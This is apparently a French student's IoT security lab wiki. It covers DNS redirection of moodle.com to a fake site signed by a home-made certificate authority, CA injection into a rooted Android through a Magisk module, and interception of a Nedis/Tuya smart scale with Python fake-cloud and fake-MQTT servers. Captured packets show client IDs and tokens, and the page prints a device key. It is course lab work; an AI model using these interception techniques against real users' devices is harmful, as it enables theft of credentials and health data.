0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c1930 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
</syntaxhighlight>trouver un mdp dans l'appli nedis /data/data/com.nedis.smartlife/shared_prefs

decouverte de tinytuya : https://github.com/jasonacox/tinytuya<syntaxhighlight lang="python3">
import socket
import tinytuya
import json

LOCAL_KEY = '674d29fb978a1705'

IP_BALANCE = '172.16.10.105'

print(f"[*] Démarrage du Faux Cloud Tuya...")
print(f"[*] Clé utilisée : {LOCAL_KEY}")

server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind(('0.0.0.0', 8886))
server_socket.listen(1)

print("[*] En attente de la balance sur le port 8886...")
print("[*] Monte sur la balance maintenant !")

while True:
try:
client, addr = server_socket.accept()
print(f"\n[+] Connexion reçue de {addr[0]} !")

data = client.recv(4096)

if data:
print(f"[i] {len(data)} octets reçus (chiffrés). Tentative de décodage...")

try:
d = tinytuya.OutletDevice('DUMMY_ID', IP_BALANCE, LOCAL_KEY)
d.set_version(3.3) # Version standard WiFi

decrypted = d._decode_payload(data)

if decrypted:
print("\n" + "="*40)
print("donnés :")
print("="*40)
parsed = json.loads(decrypted)
print(json.dumps(parsed, indent=4))

if 'dps' in parsed:
print("\nVALEURS :")
for k, v in parsed['dps'].items():
print(f"- Data Point {k} : {v}")
print("="*40)
else:
print("[-] Échec du décryptage (Format inconnu ou clé incorrecte pour ce paquet)")

except Exception as e:
print(f"[-] Erreur de décodage : {e}")

client.close()

except KeyboardInterrupt:
print("\nArrêt.")
break
except Exception as e:
print(f"Erreur serveur : {e}")
</syntaxhighlight>Malheureusement, je constate (un peu tard) que notre balance ne pourra pas communiquer avec notre serveur puisque qu'elle ne possède pas le certificat de notre autorité de certification. Elle refuse donc de communiquer avec notre serveur.

== Envoi de fausses informations vers l'application ==
On va donc tenter d'envoyer des informations erronés de notre serveur vers notre application.

Dans un premier temps on va tenter d'établir une connexion sécurisé entre l'appli et notre serveur.

Tuya utilise un protocole MQTT pour les échanges de données. On va donc simuler un serveur MQTT en python qui utilise un certificat signé par notre autorité de certification.<syntaxhighlight lang="python3">
import socket
import ssl

CERT_FILE = "/etc/apache2/ssl/tuya.crt"
KEY_FILE = "/etc/apache2/ssl/tuya.key"
PORT = 8883

def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)
except Exception as e:
print(f"impossible de charger les clés SSL\n{e}")
return

bindsocket = socket.socket()
bindsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
bindsocket.bind(('0.0.0.0', PORT))
bindsocket.listen(5)

print(f"faux Serveur MQTT en écoute sur le port {PORT}...")
print("en attente de l'application Android...")

while True:
try:
newsocket, fromaddr = bindsocket.accept()
print(f"\nconnexion TCP reçue de {fromaddr[0]}")

try:
conn = context.wrap_socket(newsocket, server_side=True)
print(f"handshake SSL réussi")

data = conn.recv(1024)
print(f"données reçues ({len(data)} octets) :")
print(data)

except ssl.SSLError as e:
print(f"échec SSL rejet du certificat.\n{e}")
except Exception as e:
print(f"erreur de lecture : {e}")
finally:
pass

except KeyboardInterrupt:
print("\narrêt.")
break

if __name__ == '__main__':
start_server()
</syntaxhighlight><syntaxhighlight lang="linux-config">
connexion TCP reçue de 172.16.10.102
handshake SSL réussi
données reçues (529 octets) :
b'\x10\x8e\x04\x00\x04MQTT\x04\xce\x00<\x00lcom.nedis.smartlife_mb_e5a1220d6003e352f8b34a81cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc_DEFAULT\x00\x0ftuya/smart/will\x00\xfa{"clie
ntId":"com.nedis.smartlife_mb_e5a1220d6003e352f8b34a81cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc_DEFAULT","deviceType":"ANDROID","message":"","userName":"e5a1220d6003e352f8b34a81
cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc"}\x00up1027735_v1_4dtc78phe7grtfdfv7fp_a4206d71_mb_eu17623708062605mpDdzpA355dad9b8086f63442d98e227e039cf5315158b056398c8fb\x00\x10388c
a5a77b82c5ad'
</syntaxhighlight>On constate à la suite de cela que notre application fait totalement confiance à notre faux serveur. Il faut maintenant le format sous lequel envoyer notre message pour quelle ajoute un poids dans l'application.

SE5 IdO sécurité des objets 2025/2026 b1

2025-12-11T15:34:38Z

Vdetrez : /* Nedis Wi-Fi Smart Personal Scales */

[[Fichier:1107px-Titre page.png|sans_cadre|820x820px]]

= Serveur virtuel (17/09) =
Dans un premier temps, on vient créer un serveur virtuel sur <code>capbreton</code> avec la commande <code>xen-create-image --hostname=SE5.vdetrez --dhcp --dir=/usr/local/xen --size=10G --memory=2G --dist=daedalus --bridge=bridgeStudents</code>

Ensuite, sur capbreton dans le dossier <code>/etc/network/interfaces.d</code> on vient créer un fichier <code>g1_vdetrez</code> pour mettre en place une nouvelle interface dans le VLAN 410. <syntaxhighlight lang="linux-config">
auto Trunk.410
iface Trunk.410 inet manual
vlan-raw-device Trunk
up ip link set $IFACE up
down ip link set $IFACE down

auto g1_vdetrez
iface g1_vdetrez inet manual
bridge_ports Trunk.410
up ip link set $IFACE up
down ip link set $IFACE down

</syntaxhighlight>

On a maintenant accès à la machine SE5.vdetrez (en ayant évidemment fait l'erreur de mettre "." à la place de "-") et on vient y configurer nos adresses IPv4.

Mon adresse IPv4 routée est la <code>172.26.145.100</code> et mon IPv4 dans le VLAN 410 est <code>172.16.10.0</code> <syntaxhighlight lang="linux-config">
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
address 172.26.145.110
netmask 255.255.255.0
gateway 172.26.145.251
# post-up ethtool -K eth0 tx off

auto eth1
iface eth1 inet static
address 172.16.10.0/24
#
# The commented out line above will disable TCP checksumming which
# might resolve problems for some users. It is disabled by default
#

</syntaxhighlight>

On vérifie avec la commande <code>ip a</code><syntaxhighlight lang="linux-config">
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:41 brd ff:ff:ff:ff:ff:ff
inet 172.26.145.110/24 brd 172.26.145.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 2001:660:4401:6050:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 853sec preferred_lft 753sec
inet6 2a01:c916:2047:c850:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 2591853sec preferred_lft 604653sec
inet6 fe80::216:3eff:fe23:7441/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:42 brd ff:ff:ff:ff:ff:ff
inet 172.16.10.0/24 brd 172.16.10.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe23:7442/64 scope link
valid_lft forever preferred_lft forever

</syntaxhighlight>

Et on constate que notre serveur a accès à Internet avec la commande <code>ping 8.8.8.8</code>

= Point d'accès WiFi (29/09) =
Pour l'instant, nous mettons de côté ce point du TP car il n'est pas utile pour la suite.

= Sécurisation WiFi par WPA2-PSK =

Pour communiquer avec le routeur <code>Cisco</code>, on branche le port série en USB et on se connecte avec la commande <code>minicom -D /dev/ttyUSB0 -b 9600</code>. La première étape fut la création du SSID <code>SE5-SSID10</code>.<syntaxhighlight lang="linux-config">
dot11 ssid SE5-SSID10

vlan 410

authentication open

authentication key-management wpa version 2

wpa-psk ascii Cisco2025

exit
</syntaxhighlight>
Puis, on configure l'interface <code>Dot11Radio0</code><syntaxhighlight lang="linux-config">
interface dot11radio 0

encryption mode ciphers aes-ccm

ssid SE5-SSID10

station-role root

no shutdown
</syntaxhighlight>Après cela, on retourne sur notre serveur virtuel et on y implémente un serveur DHCP pour l'attribution des IP aux machines se connectant sur le routeur. On retrouve cette configuration dans <code>/etc/dhcp/dhcpd.conf</code><syntaxhighlight lang="linux-config">
# dhcpd.conf

option domain-name "plil.info";
option domain-name-servers ns.plil.info;

default-lease-time 600;
max-lease-time 7200;

ddns-update-style none;

authoritative;

subnet 172.16.10.0 netmask 255.255.255.0 {
range 172.16.10.100 172.16.10.200;
option domain-name-servers 172.16.10.1;
option routers 172.16.10.1;
default-lease-time 600;
max-lease-time 7200;
}
</syntaxhighlight>Puis, on implémente un serveur DNS minimal dans le fichier <code>/etc/bind/named.conf.options</code><syntaxhighlight lang="linux-config">
options {
directory "/var/cache/bind";

recursion yes;
allow-query {172.16.10.0/24; 127.0.0.1;};

forwarders {
8.8.8.8;
1.1.1.1;
};

dnssec-validation auto;

listen-on {127.0.0.1; 172.16.10.1;};
listen-on-v6 { none; };
};
</syntaxhighlight>Et enfin, on met en place une mascarade entre le VLAN 410 et le routeur du réseau des salles de projets pour donner l'accès à Internet.<syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

= Interception de flux (30/09) =

== Redirection par DNS ==
Pour cette partie, on va ajouter une zone primaire à notre serveur DNS avec le nom Internet du site que l'on veut rediriger vers notre machine.

Ici, ce sera le merveilleux <code>moodle.com</code>

D'abord, on modifie <code>/etc/bind/named.conf.local</code><syntaxhighlight lang="linux-config">
//
// Do any local configuration here
//

// Consider adding the 1918 zones here, if they are not used in your
// organization
//include "/etc/bind/zones.rfc1918";

zone "moodle.com" {
type master;
file "/etc/bind/db.moodle.com";
};
</syntaxhighlight>Puis, on crée la fameuse zone <code>db.moodle.com</code> dans le même répertoire <syntaxhighlight lang="linux-config">
$TTL 200
@ IN SOA ns.moodle.com. admin.moodle.com. (
5 ;
3600 ;
1800 ;
604800 ;
86400 ;
)
IN NS ns.moodle.com.
ns IN A 172.16.10.1
@ IN A 172.16.10.1
www IN CNAME ns
</syntaxhighlight>Pour vérifier si notre configuration est correcte, on exécute ces deux commandes :

<code>sudo named-checkconf</code>

<code>sudo named-checkzone moodle.com /etc/bind/db.moodle.com</code>

== Redirection réseau ==
Dans cette partie, on ajoute une règle <code>iptables</code> pour rediriger le flux TCP vers un port local, le <code>8080</code>.

<code>iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-ports 8080</code><syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
0 0 REDIRECT 6 -- eth0 * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 redir ports 8080

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

== Serveur apache sécurise (04/10) ==

Dans un premier temps, on va créer un certificat auto-signé :

<code>openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/apache/apache-selfsigned.key -out /etc/ssl/apache/apache-selfsigned.crt -subj "/C=FR/ST=Nord/L=Lille/O=Popo/CN=moodle.com"</code>

Puis, on configure <code>Apache2</code>
<syntaxhighlight lang="linux-config">
GNU nano 7.2 /etc/apache2/sites-available/secure-site.conf
<VirtualHost *:443>
ServerName moodle.com

DocumentRoot /var/www/html

SSLEngine on
SSLCertificateFile /etc/ssl/apache/apache.crt
SSLCertificateKeyFile /etc/ssl/apache/apache.key

# Optionnel : log
ErrorLog ${APACHE_LOG_DIR}/ssl-error.log
CustomLog ${APACHE_LOG_DIR}/ssl-access.log combined
</VirtualHost>

# Redirection HTTP ^f^r HTTPS
<VirtualHost *:80>
ServerName moodle.com
Redirect permanent / https://moodle.com/
</VirtualHost>
</syntaxhighlight>

Maintenant, en prévision de la suite (voir explication dans Machine virtuelle Android), on va créer une autorité de certification nommée CertiFiable :

<code>openssl req -x509 -new -nodes -keyout ca.key -sha256 -days 365 -out ca.crt -subj "/CN=CertiFiable"</code>

Puis, on vient générer une demande de signature de certificat :

<code>openssl req -new -newkey rsa:2048 -nodes -keyout apache.key -out apache.csr -subj "/CN=moodle.com"</code>

Enfin, on vient signer le site avec le certificat de CertiFiable :

<code>openssl x509 -req -in apache.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out apache.crt -days 365 -sha256</code>

= Machine virtuelle <code>android</code> =

== Première tentative ==
Actuellement, si on navigue sur internet et que l'on se rend sur moodle.com, on atterrit bien sûr le faux Moodle, mais comme le téléphone ne connait pas l'autorité de certification nommé CertiFiable, on a le droit à ce magnifique message de connexion non sécurisée :

[[Fichier:Avertissement moodle.png|sans_cadre]][[Fichier:Moodle le magnifique.png|sans_cadre]]

Malheureusement, il est aujourd'hui impossible d'ajouter facilement une autorité de certification sur son téléphone.

C'est pour cela qu'une solution proposée est d'installer une machine virtuelle d'une ancienne version d'<code>Android</code> où il était possible d'en ajouter.

En ayant suivi ce tuto (https://help.clouding.io/hc/en-us/articles/4405454393756-How-to-virtualize-Android-with-QEMU-KVM), j'ai réussi à installer une VM sur Zabeth4 (j'ai dû prendre une autre iso car celle du site était inaccessible).

J'ai installé <code>VNC Viewer</code> pour pouvoir manipuler la machine virtuelle.

En étant sur la VM, j'ai pu me rendre compte qu'il n'était pas possible de se connecter au WiFi, c'est la connexion du pc qui est simulé comme un réseau WiFi dans la VM.

J'ai pu réfléchir à deux solutions avant que la VM ne crash d'elle-même et soit impossible à redémarrer...

La première est toute simple, connecter la Zabeth directement au WiFi, ce qui est difficile à distance. La seconde, qui est je pense possible, est de changer la carte réseau dans les fichiers de conf de la VM pour mettre celle supportant le WiFi.

Je n'ai donc pu tester aucune de ces deux solutions, la VM n'étant plus.

== Seconde tentative ==

qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw

qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw -cdrom *android-x86*.iso -boot d

qemu-system-x86_64 -m 2048 -enable-kvm -cpu host -smp 2 -display sdl -drive file=android.img,format=raw,if=virtio -usb -device usb-host,vendorid=0x148f,productid=0x5370

== Ultime tentative ==
Cette fois ci j'utilise l'application Android Studio qui permet d'émuler des téléphones Android pour le débogage d'application. On va donc s'en servir pour créer un Android routé qui va recevoir notre certificat.

Dans un premier temps j'ai donc routé mon téléphone avec l'utilitaire Magisik en suivant ce tutoriel : https://www.youtube.com/watch?v=QzsNn3GhYYk&t=374s.

Puis je viens ajouter un module dans Magisk qui permet de recharger à chaque demarrage du téléphone le certificat en question.

Le certificat peut être ajouter dans le téléphone en utilisant la commande <code>adb push xyzxyzxyz.0</code> .

La manipulation est la suivante :<syntaxhighlight lang="linux-config">
adb shell
su
cd /data/adb/modules/
mkdir -p tuya_cert/system/etc/security/cacerts
echo "id=tuya_cert" > tuya_cert/module.prop echo "name=Tuya Certificate Injection" >> tuya_cert/module.prop echo "version=1.0" >> tuya_cert/module.prop echo "versionCode=1" >> tuya_cert/module.prop echo "author=Victo" >> tuya_cert/module.prop echo "description=Injecte le certificat Tuya dans le systeme" >> tuya_cert/module.prop
touch tuya_cert/auto_mount
cp /sdcard/Download/26e33623.0 /data/adb/modules/tuya_cert/system/etc/security/cacerts/
chmod 644 /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0
chown root:root /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0
reboot
</syntaxhighlight>On a donc maintenant une VM Android avec notre certificat. Il faut maintenant que le PC qui host cette VM soit connecté à notre borne WiFi pour pouvoir constater que notre site Moodle.com est bien redirigé et sécurisé.

= Machine <code>Android</code> (06/10) =
Pour cette dernière partie, j'ai retrouvé une tablette sous <code>Android 4.4 KitKat</code> qui permet d'ajouter des autorités de certification.

C'est donc ce que j'ai fait :

[[Fichier:Photo_certifiable.png|sans_cadre]]

Maintenant, on constate en se connectant sur moodle.com à partir de cette tablette que l'on est bien redirigé vers le faux site et qu'il est sécurisé avec le magnifique cadenas vert.

[[Fichier:Photo moodle.png|sans_cadre]]

(cette page web date du 06/10/25, elle n'est plus valable depuis le 10/10/25...)

= Nedis Wi-Fi Smart Personal Scales =

Dans ce second TP, nous allons jouer avec ce pèse personne de nedis.

Dans un premier temps, j'ai connecté la balance au réseau SE5-SSID10.

Puis j'ai remarqué que quand je tentais de me peser, la balance affichait err2.

Après une courte investigation, il s'agit d'une balance qui émet des signaux électriques pour analyser la composition corporelle donc si on se pèse avec des chaussures, cela pose problème.

Pour la suite du projet, on se pèsera avec les mains.

[[Fichier:Poid_sur_app_nedis.png|sans_cadre]]

== Redirection du poids vers notre serveur ==
Dans un premier temps, mon idée était de faire croire à la balance qu'elle communique effectivement avec son serveur pour pouvoir récupérer les informations sur la santé de l'utilisateur.

Ici on constate sur ces paquets la requête de la balance pour obtenir une IP, puis le moment ou elle l'obtient.

[[Fichier:WS connection balance.png|sans_cadre|858x858px]]

Je peux donc ping ma balance depuis mon pc (celui qui host ma VM android)

[[Fichier:PIng balance.png|sans_cadre]]

Maintenant je veux voir les messages de communication entre la balance, son serveur et l'application, pour ce faire je fais <code>tcpdump -i eth1 -n port 53</code> :<syntaxhighlight lang="linux-config">
14:46:51.115996 IP 172.16.10.105.49153 > 172.16.10.1.53: 13861+ A? m2.tuyaeu.com. (31)
14:46:51.125611 IP 172.16.10.1.53 > 172.16.10.105.49153: 13861 3/0/0 A 3.120.92.134, A 18.184.31.90, A 35.156.44.172 (79)
14:46:51.168250 IP 172.16.10.105.49153 > 172.16.10.1.53: 59035+ A? a3.tuyaeu.com. (31)
14:46:51.177967 IP 172.16.10.1.53 > 172.16.10.105.49153: 59035 3/0/0 A 18.198.62.99, A 18.158.227.228, A 3.67.116.46 (79)
14:46:51.703179 IP 172.16.10.102.57661 > 172.16.10.1.53: 30982+ AAAA? a1.tuyaeu.com. (31)
14:46:51.706085 IP 172.16.10.102.57662 > 172.16.10.1.53: 15654+ A? a1.tuyaeu.com. (31)
14:46:51.713159 IP 172.16.10.1.53 > 172.16.10.102.57661: 30982 3/0/0 AAAA 2a05:d014:afa:af02:262a:be09:e328:ff21, AAAA 2a05:d014:afa:af01:87dc:dc67:35a1:5bfe, AAAA 2a05:d014:afa:af00:1ee2:1f00:e061:e8bf (115)
14:46:51.715736 IP 172.16.10.1.53 > 172.16.10.102.57662: 15654 3/0/0 A 3.78.92.3, A 35.159.150.3, A 3.121.33.91 (79)

56 packets captured
56 packets received by filter
0 packets dropped by kernel
[4343449.827028] device eth1 left promiscuous mode

</syntaxhighlight>visiblement notre balance communique avec tuya via m2.tuyaeu.com et a3.tuyaeu.com. Par la suite on constate qu'elle communique avec une multitude de XY.tuyaeu.com.

Maintenant on refait une config similaire à moodle.com, une zone "tuyaeu.com" dans le fichier de conf de bind, un fichier db.tuyaeu.com et une page apache. Enfin on vient la signer avec notre autorité de certification.

<code>tcpdump -i eth1 -n port 53</code> :<syntaxhighlight lang="linux-config">

12:30:58.490060 IP 172.16.10.105.49153 > 172.16.10.1.53: 50294+ A? m2.tuyaeu.com. (31)
12:30:58.490174 IP 172.16.10.1.53 > 172.16.10.105.49153: 50294* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)
12:30:58.540041 IP 172.16.10.105.49153 > 172.16.10.1.53: 23785+ A? a3.tuyaeu.com. (31)
12:30:58.540132 IP 172.16.10.1.53 > 172.16.10.105.49153: 23785* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)

</syntaxhighlight>Maintenant on constate que quand la balance demande l'adresse du serveur xy.tuyaeu.com, notre DNS lui repond avec l'IP de notre serveur.

tcpdump -i eth1 host 172.16.10.105 and not port 53 -A<syntaxhighlight lang="linux-config">
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth1, link-type EN10MB (Ethernet), snapshot length 262144 bytes
12:36:41.148741 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4......<\)...........
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....X..........
.....
.. plil.info................
12:36:41.161323 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4g.....[.}T..........
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....X..........
.....
.. plil.info................
12:36:41.167616 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
i....P....Y...c....
12:36:41.490919 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
i.r.u....).........
12:36:41.993612 ARP, Request who-has 172.16.10.105 tell 172.16.10.105, length 46
..........|.-L..
i........
i..HE.....f........
12:36:42.011664 ARP, Request who-has 172.16.10.1 tell 172.16.10.105, length 46
..........|.-L..
i........
.....up. ..........
12:36:42.011672 ARP, Reply 172.16.10.1 is-at 00:16:3e:23:74:42 (oui Unknown), length 28
..........>#tB..
...|.-L..
i
12:36:42.019053 IP 172.16.10.105.3872 > 172.16.10.1.8886: Flags [S], seq 6509, win 4380, options [mss 1460], length 0
E..,......O>..
i..
.. "....m....`....<........
12:36:42.019100 IP 172.16.10.1.8886 > 172.16.10.105.3872: Flags [R.], seq 0, ack 6510, win 0, length 0
E..(..@.@..E..
...
i".. .......nP.......
12:36:42.070419 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [S], seq 6509, win 4380, options [mss 1460], length 0
E..,......O<..
i..
.B......m....`...........<.
12:36:42.070442 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [S.], seq 3767910189, ack 6510, win 64240, options [m
ss 1460], length 0
E..,..@.@..A..
...
i..B....-...n`...l.......
12:36:42.077437 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [.], ack 1, win 4380, length 0
E..(......O?..
i..
.B......n....P...4......
..
12:36:42.079986 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [P.], seq 1:68, ack 1, win 4380, length 67
E..k......N...
i..
.B......n....P...........>...:..BAohBAohbmd6aG91IFR1eVjaG5vbG9SB........................
12:36:42.080012 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [.], ack 68, win 64173, length 0
E..(..@.@.....
...
i..B.........P...l...
12:36:42.080447 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [P.], seq 1:8, ack 68, win 64173, length 7
E../..@.@.....
...
i..B.........P...l.........(
12:36:42.080533 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [F.], seq 8, ack 68, win 64173, length 0
E..(..@.@.....
...
i..B....5....P...l...
12:36:42.101652 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [.], ack 8, win 4373, length 0
E..(. ....O<..
i..
.B..........5P...4s........
12:36:42.102116 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [R.], seq 68, ack 8, win 4380, length 0
E..(.
....O;..
i..
.B..........5P...4h.....
..
12:36:43.025368 IP 172.16.10.105.23869 > 172.16.10.1.8886: Flags [S], seq 6511, win 4380, options [mss 1460], length 0
E..,......O6..
i..
.]="....o....`............9
12:36:43.025387 IP 172.16.10.1.8886 > 172.16.10.105.23869: Flags [R.], seq 0, ack 6512, win 0, length 0
E..(..@.@..E..
...
i".]=.......pP.......
12:36:44.025225 IP 172.16.10.105.22317 > 172.16.10.1.8886: Flags [S], seq 6513, win 4380, options [mss 1460], length 0
E..,......O5..
i..
.W-"....q....`....+........
12:36:44.025269 IP 172.16.10.1.8886 > 172.16.10.105.22317: Flags [R.], seq 0, ack 6514, win 0, length 0
E..(..@.@..E..
...
i".W-.......rP.......
12:36:45.025301 IP 172.16.10.105.31465 > 172.16.10.1.8886: Flags [S], seq 6517, win 4380, options [mss 1460], length 0
E..,......O4..
i..
.z."....u....`...ck......E.
12:36:45.025318 IP 172.16.10.1.8886 > 172.16.10.105.31465: Flags [R.], seq 0, ack 6518, win 0, length 0
E..(..@.@..E..
...
i".z........vP....0..
12:36:46.025500 IP 172.16.10.105.9070 > 172.16.10.1.8886: Flags [S], seq 6521, win 4380, options [mss 1460], length 0
E..,......O3..
i..
.#n"....y....`.............
12:36:46.025517 IP 172.16.10.1.8886 > 172.16.10.105.9070: Flags [R.], seq 0, ack 6522, win 0, length 0
E..(..@.@..E..
...
i".#n.......zP.......
12:36:47.033189 IP 172.16.10.105.51179 > 172.16.10.1.8886: Flags [S], seq 6527, win 4380, options [mss 1460], length 0
E..,......O2..
i..
...".........`...._......y.
12:36:47.033206 IP 172.16.10.1.8886 > 172.16.10.105.51179: Flags [R.], seq 0, ack 6528, win 0, length 0
E..(..@.@..E..
...
i"...........P...?$..
12:36:47.263020 ARP, Request who-has 172.16.10.105 tell 172.16.10.1, length 28
..........>#tB..
.........
i
12:36:48.287049 ARP, Request who-has 172.16.10.105 tell 172.16.10.1, length 28
..........>#tB..
.........
i
12:36:48.653641 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4B...................
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....Q..........
.....
.. plil.info................
12:36:48.663352 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4.L.......p..........
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....Q..........
.....
.. plil.info................
12:36:48.674677 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
i>#tB./..P.........
12:36:48.993649 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
ir...P.............
12:36:49.311055 ARP, Request who-has 172.16.10.105 tell 172.16.10.1, length 28
..........>#tB..
.........
i
12:36:49.490922 ARP, Request who-has 172.16.10.105 tell 172.16.10.105, length 46
..........|.-L..
i........
i.......x....D.....
12:36:49.492262 ARP, Reply 172.16.10.105 is-at a4:e5:7c:16:2d:4c (oui Unknown), length 46
..........|.-L..
i..>#tB..
...................
12:36:49.515651 IP 172.16.10.105.29415 > 172.16.10.1.8886: Flags [S], seq 6536, win 4380, options [mss 1460], length 0
E..,......O...
i..
.r.".........`...kZ........
12:36:49.515669 IP 172.16.10.1.8886 > 172.16.10.105.29415: Flags [R.], seq 0, ack 6537, win 0, length 0
E..(..@.@..E..
...
i".r.........P.......
12:36:49.518628 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [S], seq 6539, win 4380, options [mss 1460], length 0
E..,......O-..
i..
.z]..........`.............
12:36:49.518648 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [S.], seq 1378912894, ack 6540, win 64240, options [m
ss 1460], length 0
E..,..@.@..A..
...
i..z]R0.~....`...l.......
12:36:49.523505 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [.], ack 1, win 4380, length 0
E..(......O0..
i..
.z]......R0..P........a3.tu
12:36:49.527055 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [P.], seq 1:68, ack 1, win 4380, length 67
E..k......N...
i..
.z]......R0..P...G?......>...:..BAohBAohbmd6aG91IFR1eVjaG5vbG9SB........................
12:36:49.527081 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [.], ack 68, win 64173, length 0
E..(..@.@..X..
...
i..z]R0......P...l...
12:36:49.527462 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [P.], seq 1:8, ack 68, win 64173, length 7
E../..@.@..P..
...
i..z]R0......P...l.........(
12:36:49.527530 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [F.], seq 8, ack 68, win 64173, length 0
E..(..@.@..V..
...
i..z]R0......P...l...
12:36:49.569636 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [.], ack 8, win 4373, length 0
E..(......O...
i..
.z]......R0..P..........C.@
12:36:49.574893 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [R.], seq 68, ack 8, win 4380, length 0
E..(......O-..
i..
.z]......R0..P..........
..
12:36:50.310055 ARP, Request who-has 172.16.10.105 tell 172.16.10.105, length 46
